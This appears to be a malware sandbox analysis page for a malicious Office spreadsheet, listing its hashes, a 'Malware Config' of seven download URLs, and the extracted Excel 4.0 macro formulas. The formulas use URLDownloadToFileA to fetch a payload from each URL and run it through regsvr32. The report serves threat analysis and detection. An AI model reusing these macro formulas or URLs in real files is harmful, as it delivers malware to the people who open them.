Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
General
-
Target
f79f25604a78cd815328c8e39e3289572dd59c9edb601a34b0a581e412c45b25
-
Size
38KB
-
MD5
68bb87d405663f89976f2646ce87a7d5
-
SHA1
01b51b47b141f27baa890dd6781d86cb4ddb19c7
-
SHA256
f79f25604a78cd815328c8e39e3289572dd59c9edb601a34b0a581e412c45b25
-
SHA512
91411e57372cbdf67fc175da34a4202a44788c43c2f2ef6278a854eff4a4b63badf3dfa20b7e1edd848295d8228152bf6410b95c0d4fecfe695351592f64bb8d
-
SSDEEP
768:3+d/GCR8UjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFVIyu:3WT9OZZ1ZYpoQ/pMAeVIy08a
Malware Config
Extracted
https://al-brik.com/vb/pjD6kXT79JBgdqhtgBU/
https://alicehui.com/pics/yjGo0PrY/
https://albassiria.ma/EhT0YlEAF7/XsmBCt/
https://vika.pl/backup/Q4bAjod4QKE6epp/
https://andiso.dk/limny/2ZTmq/
https://www.impactad.co.kr/images/EDltKgE5p/
https://babylee.cl/site/sTBIv21f/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://al-brik.com/vb/pjD6kXT79JBgdqhtgBU/","..\wnru.ocx",0,0) =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alicehui.com/pics/yjGo0PrY/","..\wnru.ocx",0,0)) =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://albassiria.ma/EhT0YlEAF7/XsmBCt/","..\wnru.ocx",0,0)) =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vika.pl/backup/Q4bAjod4QKE6epp/","..\wnru.ocx",0,0)) =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://andiso.dk/limny/2ZTmq/","..\wnru.ocx",0,0)) =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.impactad.co.kr/images/EDltKgE5p/","..\wnru.ocx",0,0)) =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://babylee.cl/site/sTBIv21f/","..\wnru.ocx",0,0)) =IF('HUNJK'!E27<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\wnru.ocx") =RETURN()
Signatures
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
Files
-
f79f25604a78cd815328c8e39e3289572dd59c9edb601a34b0a581e412c45b25